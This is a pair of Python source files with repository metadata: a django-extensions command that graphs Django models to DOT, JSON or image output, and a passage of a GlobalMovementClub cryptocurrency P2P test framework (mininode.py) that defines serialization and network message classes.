bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
[ "MIT" ]
null
null
null
django_extensions/management/commands/graph_models.py
kaozdl/django-extensions
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import sys import json import os import tempfile import six from django.conf import settings from django.core.management.base import BaseCommand, CommandError from django_extensions.management.modelviz import ModelGraph, generate_dot from django_extensions.management.utils import signalcommand try: import pygraphviz HAS_PYGRAPHVIZ = True except ImportError: HAS_PYGRAPHVIZ = False try: try: import pydotplus as pydot except ImportError: import pydot HAS_PYDOT = True except ImportError: HAS_PYDOT = False class Command(BaseCommand): help = "Creates a GraphViz dot file for the specified app names. You can pass multiple app names and they will all be combined into a single model. Output is usually directed to a dot file." can_import_settings = True def __init__(self, *args, **kwargs): """ Allow defaults for arguments to be set in settings.GRAPH_MODELS. Each argument in self.arguments is a dict where the key is the space-separated args and the value is our kwarg dict. The default from settings is keyed as the long arg name with '--' removed and any '-' replaced by '_'. For example, the default value for --disable-fields can be set in settings.GRAPH_MODELS['disable_fields']. """ self.arguments = { '--pygraphviz': { 'action': 'store_true', 'default': False, 'dest': 'pygraphviz', 'help': 'Output graph data as image using PyGraphViz.', }, '--pydot': { 'action': 'store_true', 'default': False, 'dest': 'pydot', 'help': 'Output graph data as image using PyDot(Plus).', }, '--dot': { 'action': 'store_true', 'default': False, 'dest': 'dot', 'help': 'Output graph data as raw DOT (graph description language) text data.', }, '--json': { 'action': 'store_true', 'default': False, 'dest': 'json', 'help': 'Output graph data as JSON', }, '--disable-fields -d': { 'action': 'store_true', 'default': False, 'dest': 'disable_fields', 'help': 'Do not show the class member fields', }, '--disable-abstract-fields': { 'action': 'store_true', 'default': False, 'dest': 'disable_abstract_fields', 'help': 'Do not show the class member fields that were inherited', }, '--group-models -g': { 'action': 'store_true', 'default': False, 'dest': 'group_models', 'help': 'Group models together respective to their application', }, '--all-applications -a': { 'action': 'store_true', 'default': False, 'dest': 'all_applications', 'help': 'Automatically include all applications from INSTALLED_APPS', }, '--output -o': { 'action': 'store', 'dest': 'outputfile', 'help': 'Render output file. Type of output dependend on file extensions. Use png or jpg to render graph to image.', }, '--layout -l': { 'action': 'store', 'dest': 'layout', 'default': 'dot', 'help': 'Layout to be used by GraphViz for visualization. Layouts: circo dot fdp neato nop nop1 nop2 twopi', }, '--verbose-names -n': { 'action': 'store_true', 'default': False, 'dest': 'verbose_names', 'help': 'Use verbose_name of models and fields', }, '--language -L': { 'action': 'store', 'dest': 'language', 'help': 'Specify language used for verbose_name localization', }, '--exclude-columns -x': { 'action': 'store', 'dest': 'exclude_columns', 'help': 'Exclude specific column(s) from the graph. Can also load exclude list from file.', }, '--exclude-models -X': { 'action': 'store', 'dest': 'exclude_models', 'help': 'Exclude specific model(s) from the graph. Can also load exclude list from file. Wildcards (*) are allowed.', }, '--include-models -I': { 'action': 'store', 'dest': 'include_models', 'help': 'Restrict the graph to specified models. Wildcards (*) are allowed.', }, '--inheritance -e': { 'action': 'store_true', 'default': True, 'dest': 'inheritance', 'help': 'Include inheritance arrows (default)', }, '--no-inheritance -E': { 'action': 'store_false', 'default': False, 'dest': 'inheritance', 'help': 'Do not include inheritance arrows', }, '--hide-relations-from-fields -R': { 'action': 'store_false', 'default': True, 'dest': 'relations_as_fields', 'help': 'Do not show relations as fields in the graph.', }, '--disable-sort-fields -S': { 'action': 'store_false', 'default': True, 'dest': 'sort_fields', 'help': 'Do not sort fields', }, } defaults = getattr(settings, 'GRAPH_MODELS', None) if defaults: for argument in self.arguments: arg_split = argument.split(' ') setting_opt = arg_split[0].lstrip('-').replace('-', '_') if setting_opt in defaults: self.arguments[argument]['default'] = defaults[setting_opt] super(Command, self).__init__(*args, **kwargs) def add_arguments(self, parser): """Unpack self.arguments for parser.add_arguments.""" parser.add_argument('app_label', nargs='*') for argument in self.arguments: parser.add_argument(*argument.split(' '), **self.arguments[argument]) @signalcommand def handle(self, *args, **options): args = options['app_label'] if not args and not options['all_applications']: raise CommandError("need one or more arguments for appname") # determine output format based on options, file extension, and library # availability outputfile = options.get("outputfile") or "" _, outputfile_ext = os.path.splitext(outputfile) outputfile_ext = outputfile_ext.lower() output_opts_names = ['pydot', 'pygraphviz', 'json', 'dot'] output_opts = {k: v for k, v in options.items() if k in output_opts_names} output_opts_count = sum(output_opts.values()) if output_opts_count > 1: raise CommandError("Only one of %s can be set." % ", ".join(["--%s" % opt for opt in output_opts_names])) if output_opts_count == 1: output = next(key for key, val in output_opts.items() if val) elif not outputfile: # When neither outputfile nor a output format option are set, # default to printing .dot format to stdout. Kept for backward # compatibility. output = "dot" elif outputfile_ext == ".dot": output = "dot" elif outputfile_ext == ".json": output = "json" elif HAS_PYGRAPHVIZ: output = "pygraphviz" elif HAS_PYDOT: output = "pydot" else: raise CommandError("Neither pygraphviz nor pydotplus could be found to generate the image. To generate text output, use the --json or --dot options.") # Consistency check: Abort if --pygraphviz or --pydot options are set # but no outputfile is specified. Before 2.1.4 this silently fell back # to printind .dot format to stdout. if output in ["pydot", "pygraphviz"] and not outputfile: raise CommandError("An output file (--output) must be specified when --pydot or --pygraphviz are set.") cli_options = ' '.join(sys.argv[2:]) graph_models = ModelGraph(args, cli_options=cli_options, **options) graph_models.generate_graph_data() if output == "json": graph_data = graph_models.get_graph_data(as_json=True) return self.render_output_json(graph_data, outputfile) graph_data = graph_models.get_graph_data(as_json=False) dotdata = generate_dot(graph_data) if not six.PY3: dotdata = dotdata.encode("utf-8") if output == "pygraphviz": return self.render_output_pygraphviz(dotdata, **options) if output == "pydot": return self.render_output_pydot(dotdata, **options) self.print_output(dotdata, outputfile) def print_output(self, dotdata, output_file=None): """Write model data to file or stdout in DOT (text) format.""" if six.PY3 and isinstance(dotdata, six.binary_type): dotdata = dotdata.decode() if output_file: with open(output_file, 'wt') as dot_output_f: dot_output_f.write(dotdata) else: self.stdout.write(dotdata) def render_output_json(self, graph_data, output_file=None): """Write model data to file or stdout in JSON format.""" if output_file: with open(output_file, 'wt') as json_output_f: json.dump(graph_data, json_output_f) else: self.stdout.write(json.dumps(graph_data)) def render_output_pygraphviz(self, dotdata, **kwargs): """Render model data as image using pygraphviz""" if not HAS_PYGRAPHVIZ: raise CommandError("You need to install pygraphviz python module") version = pygraphviz.__version__.rstrip("-svn") try: if tuple(int(v) for v in version.split('.')) < (0, 36): # HACK around old/broken AGraph before version 0.36 (ubuntu ships with this old version) tmpfile = tempfile.NamedTemporaryFile() tmpfile.write(dotdata) tmpfile.seek(0) dotdata = tmpfile.name except ValueError: pass graph = pygraphviz.AGraph(dotdata) graph.layout(prog=kwargs['layout']) graph.draw(kwargs['outputfile']) def render_output_pydot(self, dotdata, **kwargs): """Render model data as image using pydot""" if not HAS_PYDOT: raise CommandError("You need to install pydot python module") graph = pydot.graph_from_dot_data(dotdata) if not graph: raise CommandError("pydot returned an error") if isinstance(graph, (list, tuple)): if len(graph) > 1: sys.stderr.write("Found more then one graph, rendering only the first one.\n") graph = graph[0] output_file = kwargs['outputfile'] formats = [ 'bmp', 'canon', 'cmap', 'cmapx', 'cmapx_np', 'dot', 'dia', 'emf', 'em', 'fplus', 'eps', 'fig', 'gd', 'gd2', 'gif', 'gv', 'imap', 'imap_np', 'ismap', 'jpe', 'jpeg', 'jpg', 'metafile', 'pdf', 'pic', 'plain', 'plain-ext', 'png', 'pov', 'ps', 'ps2', 'svg', 'svgz', 'tif', 'tiff', 'tk', 'vml', 'vmlz', 'vrml', 'wbmp', 'xdot', ] ext = output_file[output_file.rfind('.') + 1:] format_ = ext if ext in formats else 'raw' graph.write(output_file, format=format_)
40.338926
194
0.546294
fc464cc39c7a9db9cf3895c1311e7dabc8f105e9
39,124
py
Python
qa/rpc-tests/test_framework/mininode.py
globalmovementclub/globalmovementclub
be5123a8e199cbe584963eedbe7e6f57e50374a1
[ "MIT" ]
1
2020-01-11T17:22:09.000Z
2020-01-11T17:22:09.000Z
qa/rpc-tests/test_framework/mininode.py
grandmastercoin/grandmastercoin
be5123a8e199cbe584963eedbe7e6f57e50374a1
[ "MIT" ]
1
2020-09-24T02:21:29.000Z
2020-09-24T02:21:29.000Z
qa/rpc-tests/test_framework/mininode.py
globalmovementclub/globalmovementclub
be5123a8e199cbe584963eedbe7e6f57e50374a1
[ "MIT" ]
1
2019-07-06T03:37:05.000Z
2019-07-06T03:37:05.000Z
# mininode.py - GlobalMovementClub P2P network half-a-node # # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # This python code was modified from ArtForz' public domain half-a-node, as # found in the mini-node branch of http://github.com/jgarzik/pynode. # # NodeConn: an object which manages p2p connectivity to a globalmovementclub node # NodeConnCB: a base class that describes the interface for receiving # callbacks with network messages from a NodeConn # CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....: # data structures that should map to corresponding structures in # globalmovementclub/primitives # msg_block, msg_tx, msg_headers, etc.: # data structures that represent network messages # ser_*, deser_*: functions that handle serialization/deserialization import struct import socket import asyncore import time import sys import random from binascii import hexlify, unhexlify from io import BytesIO from codecs import encode import hashlib from threading import RLock from threading import Thread import logging import copy import globalmovementclub_hash BIP0031_VERSION = 60000 MY_VERSION = 70208 # current MIN_PEER_PROTO_VERSION MY_SUBVERSION = b"/python-mininode-tester:0.0.2/" MAX_INV_SZ = 50000 MAX_BLOCK_SIZE = 1000000 COIN = 100000000L # 1 btc in satoshis # Keep our own socket map for asyncore, so that we can track disconnects # ourselves (to workaround an issue with closing an asyncore socket when # using select) mininode_socket_map = dict() # One lock for synchronizing all data access between the networking thread (see # NetworkThread below) and the thread running the test logic. For simplicity, # NodeConn acquires this lock whenever delivering a message to to a NodeConnCB, # and whenever adding anything to the send buffer (in send_message()). This # lock should be acquired in the thread running the test logic to synchronize # access to any data shared with the NodeConnCB or NodeConn. mininode_lock = RLock() # Serialization/deserialization tools def sha256(s): return hashlib.new('sha256', s).digest() def hash256(s): return sha256(sha256(s)) def globalmovementclubhash(s): return globalmovementclub_hash.getPoWHash(s) def deser_string(f): nit = struct.unpack("<B", f.read(1))[0] if nit == 253: nit = struct.unpack("<H", f.read(2))[0] elif nit == 254: nit = struct.unpack("<I", f.read(4))[0] elif nit == 255: nit = struct.unpack("<Q", f.read(8))[0] return f.read(nit) def ser_string(s): if len(s) < 253: return struct.pack("B", len(s)) + s elif len(s) < 0x10000: return struct.pack("<BH", 253, len(s)) + s elif len(s) < 0x100000000L: return struct.pack("<BI", 254, len(s)) + s return struct.pack("<BQ", 255, len(s)) + s def deser_uint256(f): r = 0L for i in xrange(8): t = struct.unpack("<I", f.read(4))[0] r += t << (i * 32) return r def ser_uint256(u): rs = b"" for i in xrange(8): rs += struct.pack("<I", u & 0xFFFFFFFFL) u >>= 32 return rs def uint256_from_str(s): r = 0L t = struct.unpack("<IIIIIIII", s[:32]) for i in xrange(8): r += t[i] << (i * 32) return r def uint256_from_compact(c): nbytes = (c >> 24) & 0xFF v = (c & 0xFFFFFFL) << (8 * (nbytes - 3)) return v def deser_vector(f, c): nit = struct.unpack("<B", f.read(1))[0] if nit == 253: nit = struct.unpack("<H", f.read(2))[0] elif nit == 254: nit = struct.unpack("<I", f.read(4))[0] elif nit == 255: nit = struct.unpack("<Q", f.read(8))[0] r = [] for i in xrange(nit): t = c() t.deserialize(f) r.append(t) return r def ser_vector(l): r = b"" if len(l) < 253: r = struct.pack("B", len(l)) elif len(l) < 0x10000: r = struct.pack("<BH", 253, len(l)) elif len(l) < 0x100000000L: r = struct.pack("<BI", 254, len(l)) else: r = struct.pack("<BQ", 255, len(l)) for i in l: r += i.serialize() return r def deser_uint256_vector(f): nit = struct.unpack("<B", f.read(1))[0] if nit == 253: nit = struct.unpack("<H", f.read(2))[0] elif nit == 254: nit = struct.unpack("<I", f.read(4))[0] elif nit == 255: nit = struct.unpack("<Q", f.read(8))[0] r = [] for i in xrange(nit): t = deser_uint256(f) r.append(t) return r def ser_uint256_vector(l): r = b"" if len(l) < 253: r = struct.pack("B", len(l)) elif len(l) < 0x10000: r = struct.pack("<BH", 253, len(l)) elif len(l) < 0x100000000L: r = struct.pack("<BI", 254, len(l)) else: r = struct.pack("<BQ", 255, len(l)) for i in l: r += ser_uint256(i) return r def deser_string_vector(f): nit = struct.unpack("<B", f.read(1))[0] if nit == 253: nit = struct.unpack("<H", f.read(2))[0] elif nit == 254: nit = struct.unpack("<I", f.read(4))[0] elif nit == 255: nit = struct.unpack("<Q", f.read(8))[0] r = [] for i in xrange(nit): t = deser_string(f) r.append(t) return r def ser_string_vector(l): r = b"" if len(l) < 253: r = struct.pack("B", len(l)) elif len(l) < 0x10000: r = struct.pack("<BH", 253, len(l)) elif len(l) < 0x100000000L: r = struct.pack("<BI", 254, len(l)) else: r = struct.pack("<BQ", 255, len(l)) for sv in l: r += ser_string(sv) return r def deser_int_vector(f): nit = struct.unpack("<B", f.read(1))[0] if nit == 253: nit = struct.unpack("<H", f.read(2))[0] elif nit == 254: nit = struct.unpack("<I", f.read(4))[0] elif nit == 255: nit = struct.unpack("<Q", f.read(8))[0] r = [] for i in xrange(nit): t = struct.unpack("<i", f.read(4))[0] r.append(t) return r def ser_int_vector(l): r = b"" if len(l) < 253: r = struct.pack("B", len(l)) elif len(l) < 0x10000: r = struct.pack("<BH", 253, len(l)) elif len(l) < 0x100000000L: r = struct.pack("<BI", 254, len(l)) else: r = struct.pack("<BQ", 255, len(l)) for i in l: r += struct.pack("<i", i) return r # Deserialize from a hex string representation (eg from RPC) def FromHex(obj, hex_string): obj.deserialize(BytesIO(unhexlify(hex_string.encode('ascii')))) return obj # Convert a binary-serializable object to hex (eg for submission via RPC) def ToHex(obj): return hexlify(obj.serialize()).decode('ascii') # Objects that map to gmcd objects, which can be serialized/deserialized class CAddress(object): def __init__(self): self.nServices = 1 self.pchReserved = b"\x00" * 10 + b"\xff" * 2 self.ip = "0.0.0.0" self.port = 0 def deserialize(self, f): self.nServices = struct.unpack("<Q", f.read(8))[0] self.pchReserved = f.read(12) self.ip = socket.inet_ntoa(f.read(4)) self.port = struct.unpack(">H", f.read(2))[0] def serialize(self): r = b"" r += struct.pack("<Q", self.nServices) r += self.pchReserved r += socket.inet_aton(self.ip) r += struct.pack(">H", self.port) return r def __repr__(self): return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices, self.ip, self.port) class CInv(object): typemap = { 0: "Error", 1: "TX", 2: "Block"} def __init__(self, t=0, h=0L): self.type = t self.hash = h def deserialize(self, f): self.type = struct.unpack("<i", f.read(4))[0] self.hash = deser_uint256(f) def serialize(self): r = b"" r += struct.pack("<i", self.type) r += ser_uint256(self.hash) return r def __repr__(self): return "CInv(type=%s hash=%064x)" \ % (self.typemap[self.type], self.hash) class CBlockLocator(object): def __init__(self): self.nVersion = MY_VERSION self.vHave = [] def deserialize(self, f): self.nVersion = struct.unpack("<i", f.read(4))[0] self.vHave = deser_uint256_vector(f) def serialize(self): r = b"" r += struct.pack("<i", self.nVersion) r += ser_uint256_vector(self.vHave) return r def __repr__(self): return "CBlockLocator(nVersion=%i vHave=%s)" \ % (self.nVersion, repr(self.vHave)) class COutPoint(object): def __init__(self, hash=0, n=0): self.hash = hash self.n = n def deserialize(self, f): self.hash = deser_uint256(f) self.n = struct.unpack("<I", f.read(4))[0] def serialize(self): r = b"" r += ser_uint256(self.hash) r += struct.pack("<I", self.n) return r def __repr__(self): return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n) class CTxIn(object): def __init__(self, outpoint=None, scriptSig=b"", nSequence=0): if outpoint is None: self.prevout = COutPoint() else: self.prevout = outpoint self.scriptSig = scriptSig self.nSequence = nSequence def deserialize(self, f): self.prevout = COutPoint() self.prevout.deserialize(f) self.scriptSig = deser_string(f) self.nSequence = struct.unpack("<I", f.read(4))[0] def serialize(self): r = b"" r += self.prevout.serialize() r += ser_string(self.scriptSig) r += struct.pack("<I", self.nSequence) return r def __repr__(self): return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \ % (repr(self.prevout), hexlify(self.scriptSig), self.nSequence) class CTxOut(object): def __init__(self, nValue=0, scriptPubKey=b""): self.nValue = nValue self.scriptPubKey = scriptPubKey def deserialize(self, f): self.nValue = struct.unpack("<q", f.read(8))[0] self.scriptPubKey = deser_string(f) def serialize(self): r = b"" r += struct.pack("<q", self.nValue) r += ser_string(self.scriptPubKey) return r def __repr__(self): return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \ % (self.nValue // COIN, self.nValue % COIN, hexlify(self.scriptPubKey)) class CTransaction(object): def __init__(self, tx=None): if tx is None: self.nVersion = 1 self.vin = [] self.vout = [] self.nLockTime = 0 self.sha256 = None self.hash = None else: self.nVersion = tx.nVersion self.vin = copy.deepcopy(tx.vin) self.vout = copy.deepcopy(tx.vout) self.nLockTime = tx.nLockTime self.sha256 = None self.hash = None def deserialize(self, f): self.nVersion = struct.unpack("<i", f.read(4))[0] self.vin = deser_vector(f, CTxIn) self.vout = deser_vector(f, CTxOut) self.nLockTime = struct.unpack("<I", f.read(4))[0] self.sha256 = None self.hash = None def serialize(self): r = b"" r += struct.pack("<i", self.nVersion) r += ser_vector(self.vin) r += ser_vector(self.vout) r += struct.pack("<I", self.nLockTime) return r def rehash(self): self.sha256 = None self.calc_sha256() def calc_sha256(self): if self.sha256 is None: self.sha256 = uint256_from_str(hash256(self.serialize())) self.hash = encode(hash256(self.serialize())[::-1], 'hex_codec').decode('ascii') def is_valid(self): self.calc_sha256() for tout in self.vout: if tout.nValue < 0 or tout.nValue > 21000000 * COIN: return False return True def __repr__(self): return "CTransaction(nVersion=%i vin=%s vout=%s nLockTime=%i)" \ % (self.nVersion, repr(self.vin), repr(self.vout), self.nLockTime) class CBlockHeader(object): def __init__(self, header=None): if header is None: self.set_null() else: self.nVersion = header.nVersion self.hashPrevBlock = header.hashPrevBlock self.hashMerkleRoot = header.hashMerkleRoot self.nTime = header.nTime self.nBits = header.nBits self.nNonce = header.nNonce self.sha256 = header.sha256 self.hash = header.hash self.calc_sha256() def set_null(self): self.nVersion = 1 self.hashPrevBlock = 0 self.hashMerkleRoot = 0 self.nTime = 0 self.nBits = 0 self.nNonce = 0 self.sha256 = None self.hash = None def deserialize(self, f): self.nVersion = struct.unpack("<i", f.read(4))[0] self.hashPrevBlock = deser_uint256(f) self.hashMerkleRoot = deser_uint256(f) self.nTime = struct.unpack("<I", f.read(4))[0] self.nBits = struct.unpack("<I", f.read(4))[0] self.nNonce = struct.unpack("<I", f.read(4))[0] self.sha256 = None self.hash = None def serialize(self): r = b"" r += struct.pack("<i", self.nVersion) r += ser_uint256(self.hashPrevBlock) r += ser_uint256(self.hashMerkleRoot) r += struct.pack("<I", self.nTime) r += struct.pack("<I", self.nBits) r += struct.pack("<I", self.nNonce) return r def calc_sha256(self): if self.sha256 is None: r = b"" r += struct.pack("<i", self.nVersion) r += ser_uint256(self.hashPrevBlock) r += ser_uint256(self.hashMerkleRoot) r += struct.pack("<I", self.nTime) r += struct.pack("<I", self.nBits) r += struct.pack("<I", self.nNonce) self.sha256 = uint256_from_str(globalmovementclubhash(r)) self.hash = encode(globalmovementclubhash(r)[::-1], 'hex_codec').decode('ascii') def rehash(self): self.sha256 = None self.calc_sha256() return self.sha256 def __repr__(self): return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \ % (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot, time.ctime(self.nTime), self.nBits, self.nNonce) class CBlock(CBlockHeader): def __init__(self, header=None): super(CBlock, self).__init__(header) self.vtx = [] def deserialize(self, f): super(CBlock, self).deserialize(f) self.vtx = deser_vector(f, CTransaction) def serialize(self): r = b"" r += super(CBlock, self).serialize() r += ser_vector(self.vtx) return r def calc_merkle_root(self): hashes = [] for tx in self.vtx: tx.calc_sha256() hashes.append(ser_uint256(tx.sha256)) while len(hashes) > 1: newhashes = [] for i in xrange(0, len(hashes), 2): i2 = min(i+1, len(hashes)-1) newhashes.append(hash256(hashes[i] + hashes[i2])) hashes = newhashes return uint256_from_str(hashes[0]) def is_valid(self): self.calc_sha256() target = uint256_from_compact(self.nBits) if self.sha256 > target: return False for tx in self.vtx: if not tx.is_valid(): return False if self.calc_merkle_root() != self.hashMerkleRoot: return False return True def solve(self): self.rehash() target = uint256_from_compact(self.nBits) while self.sha256 > target: self.nNonce += 1 self.rehash() def __repr__(self): return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \ % (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot, time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx)) class CUnsignedAlert(object): def __init__(self): self.nVersion = 1 self.nRelayUntil = 0 self.nExpiration = 0 self.nID = 0 self.nCancel = 0 self.setCancel = [] self.nMinVer = 0 self.nMaxVer = 0 self.setSubVer = [] self.nPriority = 0 self.strComment = b"" self.strStatusBar = b"" self.strReserved = b"" def deserialize(self, f): self.nVersion = struct.unpack("<i", f.read(4))[0] self.nRelayUntil = struct.unpack("<q", f.read(8))[0] self.nExpiration = struct.unpack("<q", f.read(8))[0] self.nID = struct.unpack("<i", f.read(4))[0] self.nCancel = struct.unpack("<i", f.read(4))[0] self.setCancel = deser_int_vector(f) self.nMinVer = struct.unpack("<i", f.read(4))[0] self.nMaxVer = struct.unpack("<i", f.read(4))[0] self.setSubVer = deser_string_vector(f) self.nPriority = struct.unpack("<i", f.read(4))[0] self.strComment = deser_string(f) self.strStatusBar = deser_string(f) self.strReserved = deser_string(f) def serialize(self): r = b"" r += struct.pack("<i", self.nVersion) r += struct.pack("<q", self.nRelayUntil) r += struct.pack("<q", self.nExpiration) r += struct.pack("<i", self.nID) r += struct.pack("<i", self.nCancel) r += ser_int_vector(self.setCancel) r += struct.pack("<i", self.nMinVer) r += struct.pack("<i", self.nMaxVer) r += ser_string_vector(self.setSubVer) r += struct.pack("<i", self.nPriority) r += ser_string(self.strComment) r += ser_string(self.strStatusBar) r += ser_string(self.strReserved) return r def __repr__(self): return "CUnsignedAlert(nVersion %d, nRelayUntil %d, nExpiration %d, nID %d, nCancel %d, nMinVer %d, nMaxVer %d, nPriority %d, strComment %s, strStatusBar %s, strReserved %s)" \ % (self.nVersion, self.nRelayUntil, self.nExpiration, self.nID, self.nCancel, self.nMinVer, self.nMaxVer, self.nPriority, self.strComment, self.strStatusBar, self.strReserved) class CAlert(object): def __init__(self): self.vchMsg = b"" self.vchSig = b"" def deserialize(self, f): self.vchMsg = deser_string(f) self.vchSig = deser_string(f) def serialize(self): r = b"" r += ser_string(self.vchMsg) r += ser_string(self.vchSig) return r def __repr__(self): return "CAlert(vchMsg.sz %d, vchSig.sz %d)" \ % (len(self.vchMsg), len(self.vchSig)) # Objects that correspond to messages on the wire class msg_version(object): command = b"version" def __init__(self): self.nVersion = MY_VERSION self.nServices = 1 self.nTime = int(time.time()) self.addrTo = CAddress() self.addrFrom = CAddress() self.nNonce = random.getrandbits(64) self.strSubVer = MY_SUBVERSION self.nStartingHeight = -1 def deserialize(self, f): self.nVersion = struct.unpack("<i", f.read(4))[0] if self.nVersion == 10300: self.nVersion = 300 self.nServices = struct.unpack("<Q", f.read(8))[0] self.nTime = struct.unpack("<q", f.read(8))[0] self.addrTo = CAddress() self.addrTo.deserialize(f) if self.nVersion >= 106: self.addrFrom = CAddress() self.addrFrom.deserialize(f) self.nNonce = struct.unpack("<Q", f.read(8))[0] self.strSubVer = deser_string(f) if self.nVersion >= 209: self.nStartingHeight = struct.unpack("<i", f.read(4))[0] else: self.nStartingHeight = None else: self.addrFrom = None self.nNonce = None self.strSubVer = None self.nStartingHeight = None def serialize(self): r = b"" r += struct.pack("<i", self.nVersion) r += struct.pack("<Q", self.nServices) r += struct.pack("<q", self.nTime) r += self.addrTo.serialize() r += self.addrFrom.serialize() r += struct.pack("<Q", self.nNonce) r += ser_string(self.strSubVer) r += struct.pack("<i", self.nStartingHeight) return r def __repr__(self): return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)' \ % (self.nVersion, self.nServices, time.ctime(self.nTime), repr(self.addrTo), repr(self.addrFrom), self.nNonce, self.strSubVer, self.nStartingHeight) class msg_verack(object): command = b"verack" def __init__(self): pass def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_verack()" class msg_addr(object): command = b"addr" def __init__(self): self.addrs = [] def deserialize(self, f): self.addrs = deser_vector(f, CAddress) def serialize(self): return ser_vector(self.addrs) def __repr__(self): return "msg_addr(addrs=%s)" % (repr(self.addrs)) class msg_alert(object): command = b"alert" def __init__(self): self.alert = CAlert() def deserialize(self, f): self.alert = CAlert() self.alert.deserialize(f) def serialize(self): r = b"" r += self.alert.serialize() return r def __repr__(self): return "msg_alert(alert=%s)" % (repr(self.alert), ) class msg_inv(object): command = b"inv" def __init__(self, inv=None): if inv is None: self.inv = [] else: self.inv = inv def deserialize(self, f): self.inv = deser_vector(f, CInv) def serialize(self): return ser_vector(self.inv) def __repr__(self): return "msg_inv(inv=%s)" % (repr(self.inv)) class msg_getdata(object): command = b"getdata" def __init__(self, inv=None): self.inv = inv if inv != None else [] def deserialize(self, f): self.inv = deser_vector(f, CInv) def serialize(self): return ser_vector(self.inv) def __repr__(self): return "msg_getdata(inv=%s)" % (repr(self.inv)) class msg_getblocks(object): command = b"getblocks" def __init__(self): self.locator = CBlockLocator() self.hashstop = 0L def deserialize(self, f): self.locator = CBlockLocator() self.locator.deserialize(f) self.hashstop = deser_uint256(f) def serialize(self): r = b"" r += self.locator.serialize() r += ser_uint256(self.hashstop) return r def __repr__(self): return "msg_getblocks(locator=%s hashstop=%064x)" \ % (repr(self.locator), self.hashstop) class msg_tx(object): command = b"tx" def __init__(self, tx=CTransaction()): self.tx = tx def deserialize(self, f): self.tx.deserialize(f) def serialize(self): return self.tx.serialize() def __repr__(self): return "msg_tx(tx=%s)" % (repr(self.tx)) class msg_block(object): command = b"block" def __init__(self, block=None): if block is None: self.block = CBlock() else: self.block = block def deserialize(self, f): self.block.deserialize(f) def serialize(self): return self.block.serialize() def __repr__(self): return "msg_block(block=%s)" % (repr(self.block)) class msg_getaddr(object): command = b"getaddr" def __init__(self): pass def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_getaddr()" class msg_ping_prebip31(object): command = b"ping" def __init__(self): pass def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_ping() (pre-bip31)" class msg_ping(object): command = b"ping" def __init__(self, nonce=0L): self.nonce = nonce def deserialize(self, f): self.nonce = struct.unpack("<Q", f.read(8))[0] def serialize(self): r = b"" r += struct.pack("<Q", self.nonce) return r def __repr__(self): return "msg_ping(nonce=%08x)" % self.nonce class msg_pong(object): command = b"pong" def __init__(self, nonce=0): self.nonce = nonce def deserialize(self, f): self.nonce = struct.unpack("<Q", f.read(8))[0] def serialize(self): r = b"" r += struct.pack("<Q", self.nonce) return r def __repr__(self): return "msg_pong(nonce=%08x)" % self.nonce class msg_mempool(object): command = b"mempool" def __init__(self): pass def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_mempool()" class msg_sendheaders(object): command = b"sendheaders" def __init__(self): pass def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_sendheaders()" # getheaders message has # number of entries # vector of hashes # hash_stop (hash of last desired block header, 0 to get as many as possible) class msg_getheaders(object): command = b"getheaders" def __init__(self): self.locator = CBlockLocator() self.hashstop = 0L def deserialize(self, f): self.locator = CBlockLocator() self.locator.deserialize(f) self.hashstop = deser_uint256(f) def serialize(self): r = b"" r += self.locator.serialize() r += ser_uint256(self.hashstop) return r def __repr__(self): return "msg_getheaders(locator=%s, stop=%064x)" \ % (repr(self.locator), self.hashstop) # headers message has # <count> <vector of block headers> class msg_headers(object): command = b"headers" def __init__(self): self.headers = [] def deserialize(self, f): # comment in gmcd indicates these should be deserialized as blocks blocks = deser_vector(f, CBlock) for x in blocks: self.headers.append(CBlockHeader(x)) def serialize(self): blocks = [CBlock(x) for x in self.headers] return ser_vector(blocks) def __repr__(self): return "msg_headers(headers=%s)" % repr(self.headers) class msg_reject(object): command = b"reject" REJECT_MALFORMED = 1 def __init__(self): self.message = b"" self.code = 0 self.reason = b"" self.data = 0L def deserialize(self, f): self.message = deser_string(f) self.code = struct.unpack("<B", f.read(1))[0] self.reason = deser_string(f) if (self.code != self.REJECT_MALFORMED and (self.message == b"block" or self.message == b"tx")): self.data = deser_uint256(f) def serialize(self): r = ser_string(self.message) r += struct.pack("<B", self.code) r += ser_string(self.reason) if (self.code != self.REJECT_MALFORMED and (self.message == b"block" or self.message == b"tx")): r += ser_uint256(self.data) return r def __repr__(self): return "msg_reject: %s %d %s [%064x]" \ % (self.message, self.code, self.reason, self.data) # Helper function def wait_until(predicate, attempts=float('inf'), timeout=float('inf')): attempt = 0 elapsed = 0 while attempt < attempts and elapsed < timeout: with mininode_lock: if predicate(): return True attempt += 1 elapsed += 0.05 time.sleep(0.05) return False # This is what a callback should look like for NodeConn # Reimplement the on_* functions to provide handling for events class NodeConnCB(object): def __init__(self): self.verack_received = False # deliver_sleep_time is helpful for debugging race conditions in p2p # tests; it causes message delivery to sleep for the specified time # before acquiring the global lock and delivering the next message. self.deliver_sleep_time = None def set_deliver_sleep_time(self, value): with mininode_lock: self.deliver_sleep_time = value def get_deliver_sleep_time(self): with mininode_lock: return self.deliver_sleep_time # Spin until verack message is received from the node. # Tests may want to use this as a signal that the test can begin. # This can be called from the testing thread, so it needs to acquire the # global lock. def wait_for_verack(self): while True: with mininode_lock: if 